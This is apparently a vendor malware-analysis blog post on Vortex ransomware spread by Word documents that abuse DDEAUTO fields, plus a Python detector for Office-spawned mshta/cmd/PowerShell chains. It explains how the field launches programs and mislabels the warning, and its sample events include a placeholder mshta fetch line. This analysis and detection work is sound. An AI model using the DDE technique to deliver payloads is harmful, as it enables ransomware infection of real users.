DDE Ransomware in a Macro-less Word Document

Malware Family: Vortex

SHA256 Hash Value


View the Full VMRay Analyzer Report

Macros in Microsoft Office have been used extensively by malware authors as a mechanism to download and execute a malicious payload on a system. Defensive measures introduced by Microsoft such as disabling macros by default have not stopped malware authors as they continue to devise social engineering techniques to convince users to enable macros thereby allowing malware to perform malicious actions. However, with email gateways and other security products incorporating VBA filtering policies for MS Office documents, malware authors are using new techniques to deliver and execute malicious payloads in Microsoft Office applications.

Dynamic Data Exchange (DDE)

One technique is the use of Dynamic Data Exchange (DDE) – a protocol that allows Windows applications to share data. In this blog post, we will take a closer look at a ransomware sample that uses DDE to execute an application directly from MS Word without any macros. This technique allows malware to easily bypass security systems or email gateways with macro filtering.

Microsoft defines DDE as a set of messages and guidelines that allows applications to share data. Microsoft's documentation explains that applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available.

Malware authors take advantage of this technique because it allows external applications to be specified as a DDE data source. Word will launch these applications to retrieve information. An external data source can be added by inserting a Field, manually changing its Field Code to DDEAUTO and appending the application path along with any additional parameters (Figure 1).

Figure 1: Launching and executing an external application using DDE

Depending on the security settings in Word, one of two warnings will be displayed whenever DDE commands are executed in a Word document (Figures 2 and 3).

Figure 2: Typical warning message associated with DDE commands (1/2)
Figure 3: Typical warning message associated with DDE commands (2/2)

Please note that while the second warning message (Figure 3) may raise suspicion, it is easy for a malware author to change the real path to the executable in the message to make it seem innocuous.

Analysis of a Ransomware Sample Using DDE

The ransomware sample that we analyzed is embedded with the DDEAUTO command, which Word executes automatically when the document is opened. The field code provides the full path of the executable as well as the arguments that are to be passed.

In this case, the sample executes mshta.exe with an external URL as shown in Figure 4.

Figure 4: DDEAUTO command in the Word document to launch an executable

The path of the mshta executable is specified in this way because it tricks Word into thinking that MSword.exe is the target application as shown in Figure 5.

Figure 5: Word Document thinking MSword.exe is the target application

The HTA file contains encoded JavaScript which executes cmd.exe and proceeds to execute PowerShell. PowerShell then downloads and executes nvss.exe which contains the ransomware.
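Because the document itself carries no macro, the most reliable place to catch this chain is process-creation telemetry: a Word process should not be the parent of mshta.exe, which in turn should not be spawning cmd.exe and PowerShell. The detection logic below is an added example, not part of the VMRay report; the events are constructed in a Sysmon-like (pid, parent pid, image, command line) shape with placeholder command lines, and the lists of Office applications and script hosts are the author's assumptions, to be tuned to the environment.

```python
"""Flag Office -> script-host process chains in process-creation telemetry
(added example; the events below are constructed, not taken from the report)."""
from collections import defaultdict
from typing import Dict, List, Tuple

Event = Tuple[int, int, str, str]  # (pid, parent pid, image path, command line)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Interpreters and built-in utilities a document should not normally spawn.
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed, Sysmon-like process-creation events (placeholder command lines).
SAMPLE_EVENTS: List[Event] = [
    (400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (1200, 400, r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "WINWORD.EXE /n invoice.docx"),
    (1300, 1200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://placeholder.invalid/x.hta"),
    (1400, 1300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c <placeholder>"),
    (1500, 1400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe <placeholder>"),
    (1600, 1200, r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),  # benign Word child (print helper)
    (1700, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe"),           # cmd from Explorer: no Office parent
]


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_office_script_chains(events: List[Event]) -> List[str]:
    """Return one 'a -> b -> c' string per Office-rooted chain of script hosts,
    following each chain as far as it continues through SCRIPT_HOSTS."""
    image: Dict[int, str] = {pid: basename(img) for pid, _, img, _ in events}
    children: Dict[int, List[int]] = defaultdict(list)
    for pid, ppid, _, _ in events:
        children[ppid].append(pid)

    def walk(pid: int, path: List[str], out: List[str]) -> None:
        path = path + [image[pid]]
        nxt = [c for c in children[pid] if image[c] in SCRIPT_HOSTS]
        if not nxt:
            out.append(" -> ".join(path))  # leaf of the chain: emit it
        for c in nxt:
            walk(c, path, out)

    chains: List[str] = []
    for pid, name in image.items():
        if name in OFFICE_APPS:
            for c in children[pid]:
                if image[c] in SCRIPT_HOSTS:
                    walk(c, [name], chains)
    return chains


if __name__ == "__main__":
    for chain in find_office_script_chains(SAMPLE_EVENTS):
        print("ALERT: Office application spawned script-host chain:", chain)
```

On the constructed events the only alert is `winword.exe -> mshta.exe -> cmd.exe -> powershell.exe`; the benign print helper under Word and the cmd.exe started from Explorer are left alone. Walking the chain rather than alerting on the first child keeps the whole mshta/cmd/PowerShell sequence in one alert, which is what an analyst wants to see.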

Ransomware Sample Behavior

The first action performed by the ransomware is to establish a connection with the C&C server and share the victim’s IP address and other information. This is highlighted in the behavior section of the VMRay Analyzer analysis report (Figure 6).

Figure 6: VMRay Analysis Report: Ransomware shares user information including IP address with C&C server

The second request to the C&C server returns data that is saved to a .bat file, which the malware later executes (Figures 7 and 8).

Figure 7: VMRay Analyzer log files and report: C&C server returns .bat file which is executed by the malware
Figure 8: Execution of .bat file by the ransomware sample

The next action is to download the encryption key from the C&C server (Figure 9). This key will subsequently be used in an encryption routine that encrypts all the files on the user’s system. The sample reads each file on the system, creates a new one (ending with .aes), writes the encrypted version of the file and finally deletes the original file (Figure 10).

Figure 9: VMRay Analyzer Report: Encryption key downloaded from the C&C server
Figure 10: VMRay Analyzer Report: File Encryption performed by the ransomware sample

Finally, the ransomware sample creates a “How to recover your files” text file in every directory of the user’s system (Figure 11).

Figure 11: ‘How to recover your data’ text file created by the ransomware

VMRay Analyzer Results

While AV vendors have been slow to detect this new technique (Figure 12), VMRay’s agentless hypervisor-based dynamic analysis engine scored the file 100/100 with a severity label of ‘Malicious’. Several malicious behavior patterns are detected (Figure 13) and the detailed behavior of the sample (including the network activity) is also recorded in the Behavior section of the report.

Figure 12: AV engines have been slow to detect the DDE technique used by malware authors
Figure 13: High-Level VMRay Analysis results for the DDE ransomware sample

An important point to note is that SensePost reported the vulnerability to Microsoft back in August 2017. Microsoft responded that no further action would be taken and that it would be considered as a candidate bug for a future version.
